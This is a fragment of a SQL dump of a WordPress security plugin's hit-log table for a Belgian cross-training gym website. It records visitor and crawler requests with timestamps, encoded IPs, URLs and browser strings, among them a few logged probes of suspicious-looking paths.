(74589, 1496688946.960683, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74590, 1496688947.529464, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74591, 1496688947.994823, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74592, 1496688948.507158, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74593, 1496688948.946848, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74594, 1496688949.506334, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74595, 1496688950.010913, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74596, 1496688950.704077, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74597, 1496688951.225889, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74598, 1496688951.794880, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74599, 1496688952.330526, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74600, 1496701104.406325, 1357743298, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentytwelve/system.php', 'http://crosstrainingcenter.be/wp-content/themes/twentytwelve/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74601, 1496702223.210728, 3328203529, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(74602, 1496704024.523063, 676177770, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74603, 1496704025.972562, 676177770, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74604, 1496706067.146960, 3024883487, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(74605, 1496714426.127584, 2745959577, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(74606, 1496717196.690821, 1137866330, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/wflogs/rules.php', 'http://crosstrainingcenter.be/wp-content/wflogs/rules.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74607, 1496741073.929234, 2644818921, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwi4pZ_w8qjUAhWEvRQKHUcpCNIQFggkMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ&sig2=lQ6mKjX6Bg9tNrWxeqJc5Q', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74608, 1496741075.693185, 2644818921, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74609, 1496741086.990311, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74610, 1496741090.847397, 2644818921, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74611, 1496741096.002859, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74612, 1496741105.364144, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74613, 1496741109.429707, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74614, 1496741118.597982, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74615, 1496741126.867767, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74616, 1496741373.700593, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74617, 1496741380.757156, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74618, 1496741398.391537, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74619, 1496744968.651626, 1338305248, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74620, 1496748189.070722, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74621, 1496752895.506944, 3567663235, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi5iqSDn6nUAhUEb1AKHdZqCakQFggoMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ&sig2=TgoawH5lUTYNL5oczZSGaQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(74622, 1496752900.263777, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(74623, 1496752900.731236, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(74624, 1496755767.629279, 2071806883, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36'),
(74625, 1496757695.470960, 2071806944, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(74626, 1496757695.569280, 2071807790, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(74627, 1496758088.536773, 2637637426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74628, 1496758088.537965, 2637637426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74629, 1496760652.553827, 1463941451, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9'),
(74630, 1496760866.272298, 1463941451, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9'),
(74631, 1496764223.379541, 1338305248, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74632, 1496764609.067401, 3024883608, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(74633, 1496771017.647407, 2366148111, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74634, 1496773560.700506, 1338305248, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74635, 1496774401.998394, 1427778051, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74636, 1496774405.540327, 1427778051, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74637, 1496775650.650414, 3652617456, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74638, 1496775746.483499, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74639, 1496775747.178517, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74640, 1496775747.821725, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74641, 1496775748.319654, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74642, 1496775748.788957, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74643, 1496775749.327571, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74644, 1496775749.926306, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74645, 1496775750.455426, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74646, 1496775750.966162, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74647, 1496775751.444162, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74648, 1496775751.934233, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74649, 1496787245.195284, 3250485790, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'android-app://com.google.android.googlequicksearchbox', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A520F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(74650, 1496787247.378758, 3250485790, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A520F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(74651, 1496787354.188292, 1338305248, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74652, 1496789886.078403, 1338305248, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74653, 1496796873.315471, 1581879465, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/mtsah16837.txt', '', 'Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)'),
(74654, 1496798091.945571, 1338305248, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74655, 1496801362.806035, 2637637388, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74656, 1496801363.426614, 2637637388, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74657, 1496801692.871731, 1600967944, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74658, 1496801696.560929, 2996488237, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/prix/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74659, 1496806718.836879, 1338305248, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74660, 1496811439.975305, 2637637439, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74661, 1496825737.998222, 3475901784, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74662, 1496831081.544807, 872366395, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74663, 1496832712.305939, 2493725349, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/phpmyadmin/', '', ''),
(74664, 1496835157.447455, 2303381350, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74665, 1496837446.750373, 872366375, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74666, 1496840281.971221, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74667, 1496840282.510468, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74668, 1496843031.887489, 1123631811, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74669, 1496843032.906375, 1123631626, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74670, 1496843663.721988, 1519853770, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/cod.php', 'http://crosstrainingcenter.be/cod.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(74671, 1496846612.847991, 1439241202, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.ecosia.org/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74672, 1496846614.796752, 1439241202, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74673, 1496846624.731205, 1439241202, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74674, 1496846643.116404, 1439241202, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74675, 1496846643.855634, 1439241202, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74676, 1496850319.354961, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(74677, 1496850319.884684, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74678, 1496850320.447718, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74679, 1496850321.017462, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74680, 1496850321.526643, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74681, 1496850322.018363, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74682, 1496850322.465119, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74683, 1496850323.005434, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(74684, 1496850323.444915, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74685, 1496850323.893955, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74686, 1496850324.367161, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74687, 1496850324.874793, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74688, 1496850325.299983, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74689, 1496850325.727759, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74690, 1496859286.226500, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74691, 1496859962.522996, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74692, 1496859963.240807, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74693, 1496859963.734195, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74694, 1496859964.193296, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74695, 1496859964.638049, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74696, 1496859965.113780, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74697, 1496859965.654242, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74698, 1496859966.134548, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74699, 1496859966.772241, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74700, 1496859967.224818, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74701, 1496859967.745518, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74702, 1496860611.901354, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74703, 1496861216.108762, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74704, 1496861570.968446, 2637637378, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74705, 1496861779.175538, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74706, 1496862328.578117, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
